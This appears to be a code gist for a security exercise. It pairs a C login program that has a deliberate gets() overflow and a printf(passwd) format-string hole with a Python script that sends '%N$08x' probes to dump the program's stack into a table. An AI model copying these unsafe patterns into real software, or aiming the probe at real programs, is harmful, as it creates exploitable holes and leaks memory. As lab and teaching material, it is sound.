@p3nj
Last active September 8, 2023 20:23
Python script that generates a GDB-like table of stack contents by using the format-string vulnerability in the C program below.
#include <stdio.h>
#include <stdlib.h>
/* Global buffer that login() fills from stdin with gets(); gets() has no
 * length bound, so input longer than 79 bytes overruns it (CWE-242). */
char passwd[80];
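/*
 * Entry point: prompt for a password, call login(), and dispatch on its
 * result ('T' means accepted, anything else rejected).
 *
 * login(), welcome() and quit() are defined further down this file; the
 * block-scope prototypes below give the compiler their signatures so the
 * calls are not implicit declarations (rejected by C99-and-later compilers).
 * The trailing return is nominal only: both welcome() and quit() call exit().
 */
int main(void)
{
    int login(void);
    void welcome(void);
    void quit(void);

    printf("Please enter password: ");
    if (login() == 'T')
        welcome();
    else
        quit();
    return 0;
}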
/*
 * Read a password from stdin and report whether it was accepted.
 *
 * `success` starts as 'F' and no statement here ever sets it to 'T'; the
 * function is the deliberately vulnerable target the accompanying script
 * probes, and two weaknesses are intentionally left in:
 *   - gets(passwd) reads without a length bound (CWE-242), so long input
 *     overruns the 80-byte global buffer;
 *   - printf(passwd) uses attacker-controlled input as the format string
 *     (CWE-134), so directives in the input can read stack contents (the
 *     %x probes the script sends) or corrupt memory. The hardened form is
 *     printf("%s", passwd).
 * Returns *t, i.e. the current value of `success` ('F' unless memory has
 * been altered through the format-string bug).
 */
int login()
{
    int success = 'F';
    int *t = &success; /* NOTE(review): *t simply aliases success; the reason for the indirection is not stated here */
    gets(passwd);
    printf("Password entered: ");
    printf(passwd);
    printf("\n");
    return *t;
}
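/*
 * Success path: print the greeting and terminate the process with status 0.
 * exit() is declared in <stdlib.h>; calling it without that header relies on
 * an implicit declaration, which modern compilers reject.
 */
void welcome(void)
{
    printf("Welcome, you are logged in!\n");
    exit(0);
}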
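/*
 * Failure path: print the rejection message and terminate with status 1.
 * exit() is declared in <stdlib.h>; calling it without that header relies on
 * an implicit declaration, which modern compilers reject.
 */
void quit(void)
{
    printf("Sorry, password is incorrect.\n");
    exit(1);
}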
import subprocess
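def get_stack_contents(payload, binary='./fs'):
    """Run the target once with *payload* on stdin and return its stdout.

    Args:
        payload: Text fed to the program; a newline is appended so the
            program's line read completes.
        binary: Program to run, either a path string or an argv list.
            Defaults to ``./fs`` in the current directory.

    Returns:
        The program's standard output decoded as UTF-8. Undecodable bytes
        are replaced rather than raising, because the target echoes raw
        input back.

    Raises:
        OSError: if *binary* cannot be executed (e.g. FileNotFoundError).
    """
    argv = [binary] if isinstance(binary, str) else list(binary)
    # subprocess.run waits for the child and closes all three pipes; the
    # previous Popen-based version never reaped the child or closed its
    # pipes. stderr is captured only so the child cannot block on a full
    # pipe; it is not part of the result, matching the old behaviour.
    completed = subprocess.run(
        argv,
        input=payload.encode('utf-8') + b'\n',
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        check=False,
    )
    return completed.stdout.decode('utf-8', errors='replace')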
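def generate_stack_table(*, zero_run=10, max_index=None, fetch=None):
    """Probe successive stack slots through the target's format-string bug.

    For index ``i`` = 1, 2, ... the payload ``AAAA:%<i>$08x`` is sent and the
    text the program prints after ``AAAA:`` (up to the end of that line) is
    recorded as the value of stack slot ``i``.

    Args:
        zero_run: Stop once this many consecutive ``00000000`` values have
            been seen (the original heuristic for "walked off the live
            stack").
        max_index: Hard upper bound on ``i``. ``None`` (the default) keeps
            the original unbounded behaviour, which never terminates if the
            zero run is not reached; pass a bound for untrusted targets.
        fetch: Callable ``fetch(payload) -> str`` that runs the target and
            returns its stdout; defaults to :func:`get_stack_contents`.

    Returns:
        List of ``(index, value)`` tuples in probing order. ``value`` is the
        string ``"Invalid index"`` when the marker is missing from the output.
    """
    if fetch is None:
        fetch = get_stack_contents
    table = []
    consecutive_zeros = 0
    index = 1
    while max_index is None or index <= max_index:
        output = fetch('AAAA:%{}$08x'.format(index))
        # The formatted value follows the first marker; a missing marker
        # means the target did not echo the payload at all.
        parts = output.split('AAAA:')
        if len(parts) > 1:
            value = parts[1].strip().split('\n')[0]
        else:
            value = "Invalid index"
        table.append((index, value))
        consecutive_zeros = consecutive_zeros + 1 if value == '00000000' else 0
        if consecutive_zeros >= zero_run:
            break
        index += 1
    return table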
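def main():
    """Generate the stack table and print it in a GDB-like two-column layout."""
    stack_table = generate_stack_table()
    print("Index | Value")
    print("--------------")
    for index, value in stack_table:
        print(f"{index:5} | {value}")


# Guarding the entry point keeps the probe from running as a side effect of
# importing this module (the original executed at import time).
if __name__ == "__main__":
    main()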